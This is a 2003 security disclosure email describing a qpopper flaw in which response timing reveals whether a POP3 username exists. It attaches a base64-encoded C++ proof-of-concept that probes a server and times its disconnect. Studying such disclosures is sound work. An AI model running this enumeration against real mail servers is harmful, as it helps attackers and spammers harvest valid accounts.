Date: Sat, 15 Mar 2003 20:13:43 +0100
From: Dennis Lubert <[email protected]>
To: [email protected]Subject: qpopper timing analysis on to determine if a username exists on a system
--=====================_35019895==_
Content-Type: text/plain; charset="us-ascii"; format=flowed
Hello,
during development of a pop3 tool I found an issue that makes it possible
for any user to check the validity of a user on a target system. If a user
is valid and an invalid password has been supplied, then the system waits
~10 seconds until it sends a disconnect message and disconnect. If the
username was not correct, then it disconnect immediately after the wrong
password.
This makes it possible to scan a server for valid users, to generate spam
sending lists, or to check a username for another kind of attack.
Tested against qpopper 3.1 and 4.0.4, others might be affected as well.
Attached is the source code for a program that will do a simple check on a
pop3 server. Additionally qpopper will also return an answer if the
username supplied has a UID < 100 (< 10 for 3.1), which will also been checked.
The fix should be simple, there must be a usleep() call or similar that
should either be deleted, or added also to the part where the username was
not correct.
greets
Dennis
--=====================_35019895==_
Content-Type: text/plain; name="poptest.cpp";
x-mac-type="42494E41"; x-mac-creator="74747874"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="poptest.cpp"
LyoqCiAqICRBdXRob3I6IHBsYXNtYWhoICQKICogJERhdGU6IDIwMDMvMDMvMTEgMTU6MDE6NDUg
JAogKgogKiBUaGlzIGlzIGEgcHJvb2Ygb2YgY29uY2VwdCBjb2RlIHRvIGNoZWNrIHdoZXRlciBh
IGdpdmVuIHVzZXJuYW1lIGlzIHZhbGlkIG9uCiAqIGEgc3lzdGVtIHJ1bm5pbmcgcXBvcHBlciA0
LjAuNCBhbmQgcG9zc2libHkgb3RoZXIgdmVyc2lvbnMuCiAqCiAqIENvbXBpbGUgOgogKgogKiBn
KysgLVdhbGwgcG9wdGVzdC5jcHAgLW8gcG9wdGVzdAogKiBvciAKICogZysrIC1EX0RFQlVHXyBw
b3B0ZXN0LmNwcCAtbyBwb3B0ZXN0CiAqICh0byBzZWUgd2hhdHMgZ29pbmcgb24pIAogKgogKiBS
dW4gOgogKgogKiAuL3BvcHRlc3QgPGhvc3RuYW1lPiA8dXNlcm5hbWU+CiAqCiAqIGUuZy4KICoK
ICogLi9wb3B0ZXN0IDEyNy4wLjAuMSByb290CiAqCiAqIFdoZW4gYSB1c2VybmFtZSBpcyB2YWxp
ZCBvbiB0aGUgc3lzdGVtLCBxcG9wcGVyIHdhaXRzIH4xMCBzZWNvbmRzIGJlZm9yZSBpdAogKiBz
ZW5kcyB0aGUgc2luZyBvZmYgbWVzc2FnZSB0byB0aGUgdXNlci4gSWYgdGhlIHVzZXJuYW1lIGlz
IG5vdCB2YWxpZCwgaXQKICogd2lsbCBzZW5kIGl0IGltbWVkaWF0ZWx5IGFmdGVyIHRoZSBwYXNz
d29yZCBpcyBlbnRlcmVkLgogKiBJZiB0aGUgdXNlcm5hbWUgaGFzIGEgdWlkIDwgMTAwIHFwb3Bw
ZXIgaXMgZXZlbiBzbyBuaWNlIHRvIHRlbGwgdXMuCiAqLwoKI2luY2x1ZGUgPGlvc3RyZWFtPgpl
eHRlcm4gIkMiIHsKI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4KI2luY2x1ZGUgPHN5cy90eXBlcy5o
PgojaW5jbHVkZSA8c3lzL3RpbWUuaD4KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4KI2luY2x1ZGUg
PGZjbnRsLmg+CiNpbmNsdWRlIDxlcnJuby5oPgojaW5jbHVkZSA8dW5pc3RkLmg+CiNpbmNsdWRl
IDxuZXRkYi5oPgojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1ZGUgPHN0cmluZy5oPgp9Cgp1c2lu
ZyBuYW1lc3BhY2Ugc3RkOwoKLy8jZGVmaW5lIF9ERUJVR18gMQoKaW50IG1haW4gKCBpbnQgYXJn
YywgY2hhciAqIGFyZ3ZbXSkKewogIHN0cnVjdCB0aW1ldmFsIHRpbTE7CiAgc3RydWN0IHRpbWV2
YWwgdGltMjsKICBpbnQgc29jazsKICBzdHJ1Y3QgaG9zdGVudCAqcGVlcmlwOwogIHN0cnVjdCBz
b2NrYWRkcl9pbiBwZWVyOwogIGNoYXIgKiBidWYgPSBuZXcgY2hhcls0MDk2XTsKCgogIGlmICgg
YXJnYyAhPSAzICkKICB7CiAgICAgIGNlcnIgPDwgIk11c3QgZ2l2ZSB1c2VybmFtZSBhbmQgaG9z
dCIgPDwgZW5kbDsKICAgICAgcmV0dXJuIC0xOwogIH0KCiAgCiAgc29jayA9IHNvY2tldCAoIEFG
X0lORVQsIFNPQ0tfU1RSRUFNLCAwKTsKCiAgcGVlcmlwID0gZ2V0aG9zdGJ5bmFtZSAoIGFyZ3Zb
MV0gKTsKCiAgaWYgKCAhIHBlZXJpcCApIAogIHsKICAgICAgY2VyciA8PCAiSG9zdG5hbWUgbm90
IHZhbGlkIiA8PCBlbmRsOwogICAgICByZXR1cm4gLTE7CiAgfQogIGNvdXQgPDwgIlZhbGlkYXRp
bmcgdXNlcm5hbWUgIiA8PCBhcmd2WzJdIDw8ICIgLCBwbGVhc2Ugc3RhbmQgYnkuLiIgIDw8IGVu
ZGw7CgogIHBlZXIuc2luX2ZhbWlseSA9IEFGX0lORVQ7CiAgcGVlci5zaW5fcG9ydCA9IGh0b25z
KDExMCk7CiAgcGVlci5zaW5fYWRkciA9ICooKHN0cnVjdCBpbl9hZGRyICopIHBlZXJpcC0+aF9h
ZGRyKTsKICBtZW1zZXQoJihwZWVyLnNpbl96ZXJvKSwwLDgpOwoKCgogIGlmICggY29ubmVjdCgg
c29jaywgKHNvY2thZGRyICopICYgcGVlciwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpIDwgMCkK
ICB7CiAgICAgIGNlcnIgPDwgIkNvdWxkIG5vdCBjb25uZWN0ICEiIDw8IGVuZGw7CiAgICAgIHJl
dHVybiAtMTsKICB9IAoKICBtZW1zZXQgKCBidWYsIDAsIDQwOTYgKTsKICByZWFkICggc29jaywg
YnVmLCA0MDk2ICk7CiNpZmRlZiBfREVCVUdfCiAgY291dCA8PCAiPC0gIiA8PCBidWYgPDwgZW5k
bDsKI2VuZGlmCgoKCiAgbWVtc2V0ICggYnVmLCAwLCA0MDk2ICk7CiAgc25wcmludGYgKCBidWYs
IDQwOTYsICJVU0VSICVzXHJcbiIsIGFyZ3ZbMl0pOwogIHdyaXRlICggc29jaywgYnVmLCBzdHJs
ZW4oYnVmKSApOwojaWZkZWYgX0RFQlVHXwogIGNvdXQgPDwgIi0+ICIgPDwgYnVmIDw8IGVuZGw7
CiNlbmRpZgoKICBtZW1zZXQgKCBidWYsIDAsIDQwOTYgKTsKICByZWFkICggc29jaywgYnVmLCA0
MDk2ICk7CiNpZmRlZiBfREVCVUdfCiAgY291dCA8PCAiPC0gIiA8PCBidWYgPDwgZW5kbDsKI2Vu
ZGlmCgogIHdyaXRlICggc29jaywgIlBBU1MgeHh4XHJcbiIsIDExKTsKI2lmZGVmIF9ERUJVR18K
ICBjb3V0IDw8ICItPiBQQVNTIHh4eCIgPDwgZW5kbDsKI2VuZGlmCgogIG1lbXNldCAoIGJ1Ziwg
MCwgNDA5NiApOwogIHJlYWQgKCBzb2NrLCBidWYsIDQwOTYgKTsKI2lmZGVmIF9ERUJVR18KICBj
b3V0IDw8ICI8LSAiIDw8IGJ1ZiA8PCBlbmRsOwojZW5kaWYKCiAgaWYgKCBzdHJzdHIoIGJ1Ziwg
IjEwMCIpICE9IE5VTEwgKQogIHsKICAgICAgY291dCA8PCAiVXNlciBoYXMgcHJvYmFibHkgYW4g
VUlEIDwgMTAwIGFuZCBpcyBhIHZhbGlkIHVzZXIuIiA8PCBlbmRsOwogICAgICBjbG9zZShzb2Nr
KTsKICAgICAgcmV0dXJuIDA7CiAgfQoKICBnZXR0aW1lb2ZkYXkoJnRpbTEsTlVMTCk7CiAgbWVt
c2V0ICggYnVmLCAwLCA0MDk2ICk7CiAgcmVhZCAoIHNvY2ssIGJ1ZiwgNDA5NiApOwojaWZkZWYg
X0RFQlVHXwogIGNvdXQgPDwgIjwtICIgPDwgYnVmIDw8IGVuZGw7CiNlbmRpZgogIGdldHRpbWVv
ZmRheSgmdGltMixOVUxMKTsKCiAgZG91YmxlIHMgPSAodGltMi50dl9zZWMgLSB0aW0xLnR2X3Nl
Yyk7CiAgcyArPSAoKGRvdWJsZSkodGltMi50dl91c2VjIC0gdGltMS50dl91c2VjKSkvMTAwMDAw
MC4wOwoKICBjb3V0IDw8ICJEaXNjb25uZWN0ZWQgYWZ0ZXIgIiA8PCBzIDw8ICIgc2Vjb25kcy4i
IDw8IGVuZGw7CgogIGlmICggcyA+IDEuMCApCiAgewogICAgICBjb3V0IDw8ICJVc2VyIFwiIiA8
PCBhcmd2WzJdIDw8ICJcIiBpcyBwcm9iYWJseSBhIHZhbGlkIHVzZXIiIDw8IGVuZGw7CiAgfQog
IGVsc2UKICB7CiAgICAgIGNvdXQgPDwgIlVzZXIgXCIiIDw8IGFyZ3ZbMl0gPDwgIlwiIGlzIHBy
b2JhYmx5IE5PVCBhIHZhbGlkIHVzZXIiIDw8IGVuZGw7CiAgfQogIGNsb3NlKHNvY2spOwogIHJl
dHVybiAwOwoKfQo=
--=====================_35019895==_--
